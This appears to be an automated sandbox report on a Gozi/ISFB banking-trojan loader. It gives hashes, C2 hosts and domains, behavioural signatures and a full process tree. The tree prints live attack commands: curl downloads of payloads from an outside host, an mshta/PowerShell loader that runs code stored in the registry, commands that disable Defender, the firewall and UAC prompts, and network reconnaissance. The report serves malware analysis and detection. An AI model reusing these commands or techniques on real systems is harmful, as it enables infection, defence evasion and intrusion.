Analysis

max time kernel: 151s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20220310-en
submitted: 22/03/2022, 09:41

Static task: static1
Behavioral task: behavioral1
Sample: 98b082b4d65dfe4ee5b227575d1c08ef.exe
Resource: win7-20220310-en
General

Target: 98b082b4d65dfe4ee5b227575d1c08ef.exe
Size: 215KB
MD5: 98b082b4d65dfe4ee5b227575d1c08ef
SHA1: 21d9d7f91bdab90a3900832404be3bab06e82c03
SHA256: e7767ba8bcff3242dd32f880cb59894c3ce5615a2557504db976803cd246354e
SHA512: e7e46e85699716dec1aedce1dbc7e995f5507b1de137c77110225e162ac2ffcfeedd50f2e5292302043f445ef0eaf7fc551edcf43a195d815c2c1f15469dc8c1
Malware Config

Extracted
Family: gozi_ifsb
Botnet: 3000
C2:
  config.edge.skype.com
  194.76.226.200
  giporedtrip.at
  habpfans.at
  31.214.157.187
Attributes:
  base_path: /drew/
  build: 250225
  exe_type: loader
  extension: .jlk
  server_id: 50

Extracted
Family: gozi_ifsb
Botnet: 3000
C2:
  config.edge.skype.com
  194.76.226.200
  giporedtrip.at
  habpfans.at
  31.214.157.187
Attributes:
  base_path: /images/
  exe_type: worker
  extension: .jlk
  server_id: 50
Signatures

Downloads MZ/PE file

Executes dropped EXE (4 IoCs)
  pid | Process
  4896 | A.exe
  376 | AutoIt3.exe
  1768 | AutoIt3.exe
  620 | AutoIt3.exe

Modifies Windows Firewall (1 TTPs)

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | A.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | AutoIt3.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | mshta.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileOptions = "cmd /c start C:\\Users\\Admin\\FileOptions.lnk -ep unrestricted -file C:\\Users\\Admin\\DiagramClass.ps1" | Explorer.EXE

Suspicious use of SetThreadContext (8 IoCs)
  description | pid | Process | procid_target
  PID 1768 set thread context of 620 | 1768 | AutoIt3.exe | 128
  PID 4616 set thread context of 1048 | 4616 | powershell.exe | 54
  PID 1048 set thread context of 5004 | 1048 | Explorer.EXE | 147
  PID 1048 set thread context of 3440 | 1048 | Explorer.EXE | 28
  PID 1048 set thread context of 3740 | 1048 | Explorer.EXE | 49
  PID 5004 set thread context of 2144 | 5004 | cmd.exe | 149
  PID 1048 set thread context of 3428 | 1048 | Explorer.EXE | 29
  PID 1048 set thread context of 392 | 1048 | Explorer.EXE | 30

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Discovers systems in the same network (1 TTPs, 3 IoCs)
  pid | Process
  4528 | net.exe
  3288 | net.exe
  3692 | net.exe

Enumerates processes with tasklist (1 TTPs, 1 IoCs)
  pid | Process
  216 | tasklist.exe

Gathers system information (1 TTPs, 1 IoCs)
Runs systeminfo.exe.
  pid | Process
  4444 | systeminfo.exe

Modifies system certificate store (5 IoCs)
  description | ioc | Process
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (value omitted) | A.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (value omitted) | A.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | A.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (value omitted) | A.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (value omitted) | A.exe

Runs net.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid | Process
  2144 | PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid | Process
  2144 | PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  4728 | powershell.exe (2 entries)
  1328 | powershell.exe (2 entries)
  4328 | powershell.exe (2 entries)
  4800 | powershell.exe (2 entries)
  620 | AutoIt3.exe (2 entries)
  4616 | powershell.exe (2 entries)
  1048 | Explorer.EXE (52 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid | Process
  1048 | Explorer.EXE

Suspicious behavior: MapViewOfSection (7 IoCs)
  pid | Process
  4616 | powershell.exe
  1048 | Explorer.EXE (3 entries)
  5004 | cmd.exe
  1048 | Explorer.EXE (2 entries)

Suspicious use of AdjustPrivilegeToken (12 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 4728 | powershell.exe
  Token: SeDebugPrivilege | 1328 | powershell.exe
  Token: SeDebugPrivilege | 4328 | powershell.exe
  Token: SeDebugPrivilege | 4800 | powershell.exe
  Token: SeDebugPrivilege | 4616 | powershell.exe
  Token: SeShutdownPrivilege | 1048 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 1048 | Explorer.EXE
  Token: SeShutdownPrivilege | 1048 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 1048 | Explorer.EXE
  Token: SeDebugPrivilege | 216 | tasklist.exe
  Token: SeShutdownPrivilege | 3440 | RuntimeBroker.exe (2 entries)

Suspicious use of FindShellTrayWindow (35 IoCs)
  pid | Process
  376 | AutoIt3.exe (32 entries)
  1768 | AutoIt3.exe (3 entries)

Suspicious use of SendNotifyMessage (35 IoCs)
  pid | Process
  376 | AutoIt3.exe (32 entries)
  1768 | AutoIt3.exe (3 entries)

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid | Process
  1048 | Explorer.EXE

Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 2504 wrote to memory of 4612 | 2504 | 98b082b4d65dfe4ee5b227575d1c08ef.exe | 85 (3 entries)
  PID 2504 wrote to memory of 4212 | 2504 | 98b082b4d65dfe4ee5b227575d1c08ef.exe | 86 (3 entries)
  PID 4212 wrote to memory of 3296 | 4212 | cmd.exe | 87 (3 entries)
  PID 2504 wrote to memory of 2356 | 2504 | 98b082b4d65dfe4ee5b227575d1c08ef.exe | 89 (3 entries)
  PID 2356 wrote to memory of 448 | 2356 | cmd.exe | 90 (3 entries)
  PID 2504 wrote to memory of 3684 | 2504 | 98b082b4d65dfe4ee5b227575d1c08ef.exe | 92 (3 entries)
  PID 3684 wrote to memory of 3140 | 3684 | cmd.exe | 93 (3 entries)
  PID 2504 wrote to memory of 4012 | 2504 | 98b082b4d65dfe4ee5b227575d1c08ef.exe | 95 (3 entries)
  PID 4012 wrote to memory of 4896 | 4012 | cmd.exe | 94 (3 entries)
  PID 4896 wrote to memory of 3792 | 4896 | A.exe | 97 (2 entries)
  PID 3792 wrote to memory of 960 | 3792 | cmd.exe | 99 (2 entries)
  PID 4896 wrote to memory of 1692 | 4896 | A.exe | 107 (2 entries)
  PID 1692 wrote to memory of 3948 | 1692 | cmd.exe | 109 (2 entries)
  PID 4896 wrote to memory of 3036 | 4896 | A.exe | 111 (2 entries)
  PID 3036 wrote to memory of 3608 | 3036 | cmd.exe | 113 (2 entries)
  PID 4896 wrote to memory of 4228 | 4896 | A.exe | 115 (2 entries)
  PID 4228 wrote to memory of 376 | 4228 | cmd.exe | 117 (3 entries)
  PID 376 wrote to memory of 4728 | 376 | AutoIt3.exe | 120 (3 entries)
  PID 4896 wrote to memory of 3472 | 4896 | A.exe | 122 (2 entries)
  PID 3472 wrote to memory of 1060 | 3472 | cmd.exe | 124 (2 entries)
  PID 4896 wrote to memory of 484 | 4896 | A.exe | 125 (2 entries)
  PID 484 wrote to memory of 1768 | 484 | cmd.exe | 127 (3 entries)
  PID 1768 wrote to memory of 620 | 1768 | AutoIt3.exe | 128 (5 entries)
  PID 376 wrote to memory of 1328 | 376 | AutoIt3.exe | 131 (3 entries)

System policy modification (1 TTPs, 2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | AutoIt3.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | AutoIt3.exe
Processes
(process tree; each entry shows PID and image path, then command line and triggered signatures; child processes are indented under their parent)

PID 3440  C:\Windows\System32\RuntimeBroker.exe
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
    signatures: Suspicious use of AdjustPrivilegeToken

PID 3428  C:\Windows\System32\RuntimeBroker.exe
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

PID 392  C:\Windows\System32\RuntimeBroker.exe
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

PID 3740  C:\Windows\System32\RuntimeBroker.exe
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

PID 1048  C:\Windows\Explorer.EXE
    cmdline: C:\Windows\Explorer.EXE
    signatures: Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx

    PID 2504  C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"
        signatures: Suspicious use of WriteProcessMemory

        PID 4612  C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData

        PID 4212  C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
            signatures: Suspicious use of WriteProcessMemory

            PID 3296  C:\Windows\SysWOW64\curl.exe
                cmdline: curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

        PID 2356  C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll
            signatures: Suspicious use of WriteProcessMemory

            PID 448  C:\Windows\SysWOW64\curl.exe
                cmdline: curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

        PID 3684  C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest
            signatures: Suspicious use of WriteProcessMemory

            PID 3140  C:\Windows\SysWOW64\curl.exe
                cmdline: curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

        PID 4012  C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
            signatures: Suspicious use of WriteProcessMemory

    PID 3920  C:\Windows\System32\mshta.exe
        cmdline: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xnq8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xnq8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453\\\DiagramClass'));if(!window.flag)close()</script>"
        signatures: Checks computer location settings

        PID 4616  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xvsleyr -value gp; new-alias -name whpcnio -value iex; whpcnio ([System.Text.Encoding]::ASCII.GetString((xvsleyr "HKCU:Software\AppDataLow\Software\Microsoft\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453").CharFolder))
            signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken

            PID 3832  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline"

                PID 1004  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp" "c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP"

            PID 3808  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline"

                PID 1876  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp" "c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP"

    PID 5004  C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"
        signatures: Suspicious use of SetThreadContext; Suspicious behavior: MapViewOfSection

        PID 2144  C:\Windows\system32\PING.EXE
            cmdline: ping localhost -n 5
            signatures: Runs ping.exe; Suspicious behavior: CmdExeWriteProcessMemorySpam

    PID 3132  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\34A2.bi1"

        PID 1952  C:\Windows\system32\nslookup.exe
            cmdline: nslookup myip.opendns.com resolver1.opendns.com

    PID 3720  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\34A2.bi1"

    PID 4948  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 4444  C:\Windows\system32\systeminfo.exe
            cmdline: systeminfo.exe
            signatures: Gathers system information

    PID 2372  C:\Windows\syswow64\cmd.exe
        cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

    PID 4540  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 1436  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 4528  C:\Windows\system32\net.exe
            cmdline: net view
            signatures: Discovers systems in the same network

    PID 2500  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 756  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 4892  C:\Windows\system32\nslookup.exe
            cmdline: nslookup 127.0.0.1

    PID 4580  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 4708  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 216  C:\Windows\system32\tasklist.exe
            cmdline: tasklist.exe /SVC
            signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken

    PID 4272  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 4360  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 556  C:\Windows\system32\driverquery.exe
            cmdline: driverquery.exe

    PID 4500  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 2884  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 3832  C:\Windows\system32\reg.exe
            cmdline: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

    PID 3312  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 4020  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 2768  C:\Windows\system32\net.exe
            cmdline: net config workstation

            PID 4036  C:\Windows\system32\net1.exe
                cmdline: C:\Windows\system32\net1 config workstation

    PID 4616  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 4404  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 4244  C:\Windows\system32\nltest.exe
            cmdline: nltest /domain_trusts

    PID 640  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 2396  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 5052  C:\Windows\system32\nltest.exe
            cmdline: nltest /domain_trusts /all_trusts

    PID 3020  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 3976  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 3288  C:\Windows\system32\net.exe
            cmdline: net view /all /domain
            signatures: Discovers systems in the same network

    PID 548  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 4876  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

        PID 3692  C:\Windows\system32\net.exe
            cmdline: net view /all
            signatures: Discovers systems in the same network

    PID 4332  C:\Windows\system32\cmd.exe
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

    PID 4348  C:\Windows\system32\cmd.exe
        cmdline: cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\58E.bin1 > C:\Users\Admin\AppData\Local\Temp\58E.bin & del C:\Users\Admin\AppData\Local\Temp\58E.bin1"

PID 4896  C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
    cmdline: C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
    signatures: Executes dropped EXE; Checks computer location settings; Modifies system certificate store; Suspicious use of WriteProcessMemory

    PID 3792  C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe
        signatures: Suspicious use of WriteProcessMemory

        PID 960  C:\Windows\system32\curl.exe
            cmdline: curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe

    PID 1692  C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
        signatures: Suspicious use of WriteProcessMemory

        PID 3948  C:\Windows\system32\curl.exe
            cmdline: curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

    PID 3036  C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/WD.au3 --output WD.au3
        signatures: Suspicious use of WriteProcessMemory

        PID 3608  C:\Windows\system32\curl.exe
            cmdline: curl http://sincheats.com/gas/12/WD.au3 --output WD.au3

    PID 4228  C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c start AutoIt3.exe WD.au3
        signatures: Suspicious use of WriteProcessMemory

        PID 376  C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
            cmdline: AutoIt3.exe WD.au3
            signatures: Executes dropped EXE; Checks computer location settings; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory; System policy modification

            PID 4728  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

            PID 1328  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"
                signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

            PID 4328  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\
                signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

            PID 4800  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off
                signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

                PID 3608  C:\Windows\SysWOW64\netsh.exe
                    cmdline: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

    PID 3472  C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
        signatures: Suspicious use of WriteProcessMemory

        PID 1060  C:\Windows\system32\curl.exe
            cmdline: curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

    PID 484  C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
        signatures: Suspicious use of WriteProcessMemory

        PID 1768  C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
            cmdline: C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
            signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory

            PID 620  C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
                cmdline: "C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"
                signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses